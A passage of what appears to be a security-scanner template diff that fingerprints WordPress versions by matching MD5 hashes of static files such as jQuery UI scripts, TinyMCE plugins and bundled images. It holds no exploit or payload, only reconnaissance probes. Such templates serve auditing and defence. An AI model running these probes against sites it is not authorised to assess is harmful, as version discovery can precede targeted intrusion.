"(\"2115305b0244e5d8cfb9dc458c3e1697\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"1d045fd3777c8376972022e868891b86\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"82eab8c3912d259f462a229b7b4f2081\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.progressbar.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"68e1e677a33fca5ac047a6a85166aef2\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"35086553121b0423a8f2eaaedca79152\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e90017815cdefec31a27eef26a1df6f7\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"ebaf9ac23de07b1e2edf1cfdd9d24859\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ae1d9455fbd716115805a887d3942d2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.selectable.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"1e412d9b7ffb5165882ec4ee9dca7706\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"6908d69d10dae3d04c23ca83a884ba6f\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"5498a8027d4314a6b7aecc07400c15f8\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"2a4ae2945b0ad112bc7453746e73fef0\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"5fd0d80a25092cf8dc3d9e4828ec0752\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-pulsate.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"fe8fa2aa4dd64302aa4481758019ff12\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3d639b4c14c1f6b080f746b7250554c3\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"5ac5c5ca652b881fe4073440719f9102\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-highlight.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"ad71fc19d449fe8ecd391a90dc4de8e0\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"15b8d390675cf17bc3a73c3619557fb4\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"da7641af95d688d998c837bec535ea88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"ae99e1c6db93d17a07dcce723c463239\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3d531a65189ab04b164e9ac6ff708c06\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"490d0168365536638cb63e97b69494b1\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"b2f62945320bd46f2e119cec08b9996a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"67beffac9e06139da85198dadac7e62c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-shake.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"889151a84fe86e382bb7179f1206fe96\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"782fbb6948781cffd80ddf4030196952\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4b5ef540c8212613d8bc80c90386b522\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.button.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"13e7c6415ec4583e4b315e58ec4b7834\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"1cc433c88d349c513c801378c4493f19\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"841ae1782456e0e034e446bc34c18a82\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7ad0bc035cc7e8e29092f06b28c80220\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"1f54112461c2b804e4bda1b4ba414694\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.resizable.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"e3530409f1b673099f3d157d6c76c204\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"1cca9d1d61a8a9bef77cfea0f39e793d\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ea9fbda91a34e85949e727926665f4af\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"26865f17edea007af640cfb6abc38d7a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"c14059b12deb5821c173ddbe02779cfe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.dialog.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"a4ffef594374acd633876798ffea4b91\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3248497acc4c9a3eae7d094860937708\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"29610778c84d9db4858c8aafe9315229\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a360a66b85be756d2fefd8b1ed4c4105\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"cedbf30a51c03d9ea72743da1cea9402\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-scale.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"517c49b86b5c4222824e33cf97a66d1b\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"783b0ad56b1a8a97b76079a1d41c6f88\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ebae30aac3140e8c77dff67bfe0aba5d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.position.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"99dbb2ac7cccbbc1686ff85eaf708cbf\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"eb63c3d2dace62e102af74004ccd0ff1\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"dd2ebb2a9d3b4d3e6fc95142fe607e34\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"61d86a8b3e7d4fcefbac74a1fe050f74\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ce593c703df82b3e1785156376ef1a11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-fade.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"f61525a55b0447eff9182e652db51d93\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"79debe8459f8ceca8443086bf29e16a0\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"36eebb647c0021b081027d95a4681a08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"96f1e6bd9d9d042789d9b8f297e1ffe8\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"ea7d13d6d2212ba59159c40b2a57bd3b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"14927dd90ee28ed46043547c56638549\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.core.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"47a22779d977534304f6cb122c97941a\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"739cf68f21c10e04cde3ad13fcff9063\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"f8d56d3c5539aa7af2a7d5c3b8769fad\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c57795d684b34461c7ab90c951c7b7ee\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"35c8345d40fba7cc538b677eef8ec850\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.autocomplete.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"baad8e5edee09423cfe9ee7bb80f7f4a\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"c6c4d43ac586574589a0ec4542a890a8\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"697382ab550d87badbc9e4f8ba547b60\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"cc93470f358beca9abfc5b0429a6147b\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"e4781373802509fc3a51adb8a94cecc8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.accordion.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"6b215c5f733a5bca4b177f9bda08f9f4\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"1da489eb8b596be7a49f1be959249988\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"75ac483f270380c9a0a4e8eb5b6f3dd0\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"45b90c748b46dead2768518a6b0709c7\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"c4472933c20ad20fc1d3d07cf3faa1e8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.menu.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"023299ce8c17c78401167034e5b85450\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"e0b94d0041ca790b68af39edf821d238\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"3b0fa982a618f8885056b51d41076d0c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.widget.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"6af6a92aebd26adca4ae22c3d09461f6\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"2425a542e6dde093dd85ac0b5adc0141\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"a5626b56956b854edc4435086b81e642\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7348be0976e007a8c2c02771b5e56ffa\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"0b4c5afffc6ba25e76716562a9c40a75\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-fold.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"ae38de0e6df5afa3bedc421925ce7096\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"f8cda9cadd854d552cc429d799274962\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"8074c41343e8123a8567de8af452fc72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.tooltip.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2e5eaa037be632c86345268ee8c1fe6b\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"4fbdb31340b01c249a0fe5112e0eeec9\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"a0c1fb100694e7e398afd0a3517e8273\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-slide.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"66bbb2f50ed3e02600c28fc7c859b05e\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"945300af618d04041dc49a0a5d36a917\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"d1d2843cdbebec3ec262539e8f482655\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.spinner.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"e30fecf15dccffecff23eb28c1be77af\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"ab6ea5b371afc02315dfaa7dfd4a1063\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"7a5e4203edf87c7e35b57c63bcc34903\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"362c4b75ca21578fd5c432d32fc9f1e9\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"4eac58ed8deb3189c8d05bab9187f1ce\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e36a086123756412293231aead17f24f\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"2a31d31b165267910cc15a22bcbf14ca\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"abc084e9e6b74f46560d1907bcfd87d5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.draggable.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2f11b4228a5e5d7c7dbc5531759950cf\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"67b603ea0e4abe708f871111fcf45738\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"8c3ca109cbf3a09e50c356b6a1826c05\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"5bf4c3ca95229659f8d7b0cf7d8cc1d3\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"8c466e9448e2b021e622219c814dad45\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-bounce.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"21cc68d16d1f76275ad082d7ddb3e178\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"81ee7ab27ed9b0f3556a406ff6aad80b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"575070d688f2df8beb11595b36a5406d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-transfer.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"2fef9f5562e8443aa48377192b176cd4\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"e91b94a47085eac01afbf48c8cd515f0\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0df5a22bfac5e648139f4a3cabfb39b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"b05882cb208b67920eaa74118594be2d\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"513bb6d79ab29c58ab1b32646216a3a0\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"2b09e33474c5641d8b63eaf28e870a66\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"039f3a81ac2f843432776ee10243b89a\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"10c48f90c42550a8afeb81ec34650b10\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-blind.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"8780c4224e8780a782bf0cbd950730e3\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"625c5e7376d305ce4a11fd1277de5734\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"77bc3e84b750f288c68d789dfb28144f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-explode.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"6c1e41c026f4d9164e07a06acf53e297\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"3ae92de7419e58815544147641a87930\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"ffec1f546e53676923f4a05ca20790a8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.slider.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"6c2a0e39e722f5d2a71050ee333fd2c5\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"f1b234712eabc4fea71eaadcf2e73ffa\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"38d250e04af3d561f01156273f08d578\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"9d26e2b237072855950bf775167fc9ea\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"0372be5e22fbd74d08ffea592641b29d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.sortable.min.js" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"765770c2918bd191e5ddb68675cc646c\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"cccbd3de04d2ff8cd30164925353c394\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4a6b8c51735314ad669b4a73eab51726\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"24834266535ff3a5db2919a4dfa3a3b6\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a8028f7b79584c14f5a092ed63affd4d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no-alt.png" + matchers: + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"1f8f2cd07a0f188ec8d9ff9275c45195\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/plugin.min.js" + matchers: + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"76c195e5f157603feb495fe3fffbc33d\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"752bc22829ec5687577f564a98637b9b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"e0ed4ec71acf14a2635ccbbad48a5a9f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/plugin.js" + matchers: + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"dd83030fdd725c148b2b7a4aded9da13\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"f3a8ace36ec4e062874b89d6dfddde82\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"dbda3aebfc716b2bc73abe6600b65d52\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.json" + matchers: + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"bff751d0bdde38eebbe0c90df8a510cc\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"899efe22d79dd0d675c106a242e18858\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/readme.md" + matchers: + - type: dsl + name: 3.9 - 4.7.19 + dsl: + - "(\"7a0f64800cf38b2be8d3dc4540ec31dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.json" + matchers: + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"fcf1ab0bbad7d5be115cac9ffb360a2b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"e041fb0d325f73103a921ed01e5356b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/moxieplayer.swf" + matchers: + - type: dsl + name: 3.9 - 4.7.19 + dsl: + - "(\"4e59d34efb2da0b9a033596a85e4b1ef\" == md5(body))" + - type: dsl + name: 3.4 - 3.8.35 + dsl: + - "(\"9217cea72c76c361fa5033526712284e\" == md5(body))" + - type: dsl + name: 3.5.2 - 3.6.1 + dsl: + - "(\"f1cb08168139602b35bc61f1d9823ea3\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"534258f2d5d40b3b683940d19f585695\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpembed/plugin.min.js" + matchers: + - type: dsl + name: 4.4 - 4.7.19 + dsl: + - "(\"7ec45bcbe992c74c095a75bb2d2cf0ff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpembed/plugin.js" + matchers: + - type: dsl + name: 4.4 - 4.7.19 + dsl: + - "(\"cf382af5522fa9a0bb3f049225de14ef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/wlwmanifest.xml" + matchers: + - type: dsl + name: 3.8 - 5.6 + dsl: + - "(\"dfd490b6f383ea02a269031ff05e8896\" == md5(body))" + - type: dsl + name: 3.4 - 3.7.35 + dsl: + - "(\"b23aa270acc2240a9a22082550a8680c\" == md5(body))" + - type: dsl + name: 2.7 - 3.3.3 + dsl: + - "(\"8da76e497b2666873eaa3b2f9f19617b\" == md5(body))" + - type: dsl + name: 2.3.1 - 2.6.5 + dsl: + - "(\"3dad0a2b069875a78bfc7c21554f0a24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wpicons.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"6453fcf875718d91560f5faedce361f4\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"066d3d4d2b5b1f32ea2ee76f536aa445\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"90dd81a3ac5697aca79a34a9b1bfa8fa\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"968a7e190df87105abfa07fef2d3fe61\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/icon-pointer-flag.png" + matchers: + - type: dsl + name: 3.3 - 5.6 + dsl: + - "(\"b0d32c87f2ad8bc2455ebf6a60171027\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/wp-comments.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"4cc2365d0450dedec30cec2e73a8a1d4\" == md5(body))" + - type: dsl + name: 2.3.1 - 3.4.2 + dsl: + - "(\"f12204bb737213d9c0b530b918da182d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/wp-icon.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"311d098eca9a89370877334b1b8f992a\" == md5(body))" + - type: dsl + name: 2.3.1 - 3.4.2 + dsl: + - "(\"e44d22b74f7ee4435e22062d5adf4a6a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/wp-watermark.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"3b9a87754d6ddcad447c89778e93c544\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c173b88f257603b0ea51aec2c03bec4b\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"708ebef70c64f23294d63347ececebe7\" == md5(body))" + - type: dsl + name: 2.3.1 - 3.4.2 + dsl: + - "(\"c5a6a59365ad54aa20c71e79da9dfd7a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/uploader-icons.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"b4011d935c0f4dcf0cffc0f99d6d9680\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"707b402719c2a935cc7106b1b60bffee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/toggle-arrow-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"46cae1ca5cf883f4c91243447215ef11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/toggle-arrow.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"dcdfce879761fde6123beb64cecf2af2\" == md5(body))" + - type: dsl + name: 3.5 - 4.0.32 + dsl: + - "(\"8e9022f98e990584452838f85d77c928\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"e5064769584f17a701131db269226700\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/uploader-icons-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"adc1e7b0262d80e44f18a287c395cb7e\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c1b082fb2f7786b2562c601497ea5dbc\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"ef35cb53941bef570b89317c4fba357c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/w-logo-blue.png" + matchers: + - type: dsl + name: 4.5 - 5.6 + dsl: + - "(\"fd5b4eb05706a2f05f707fe077ae1030\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/admin-bar-sprite-2x.png" + matchers: + - type: dsl + name: 4.1 - 5.6 + dsl: + - "(\"eb51ac1312eb060b9bc638fef46f80ca\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"f86b87253d8c6afb3197eebe4695a7a4\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"aae29dcdbdab4a1fbe6696c9f6b82cf0\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f33596ef4918f4902d084f1ccf3261f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/rss-2x.png" + matchers: + - type: dsl + name: 3.5 - 5.6 + dsl: + - "(\"c71759615ba051c1e6f597fd726a9d11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/text.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"7ab98773e6e430f718c89d9f5119804b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/document.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"76e5349938f6ce9179931436de1c64a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/interactive.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"52d7accb82aef17fc2c3b4c58968dc48\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/spreadsheet.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"f1c0a034e4f112d60054fcdecc873fb2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/video.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"8de0e9f175ea68179b81dddb71a010f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/code.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"2d6f96130cad55ca9310eed555a9555f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/default.png" + matchers: + - type: dsl + name: 3.9 - 5.6 + dsl: + - "(\"2db6a9e6cd49d2429668ce40e0dee762\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/media/archive.png" + matchers: + - type: dsl + 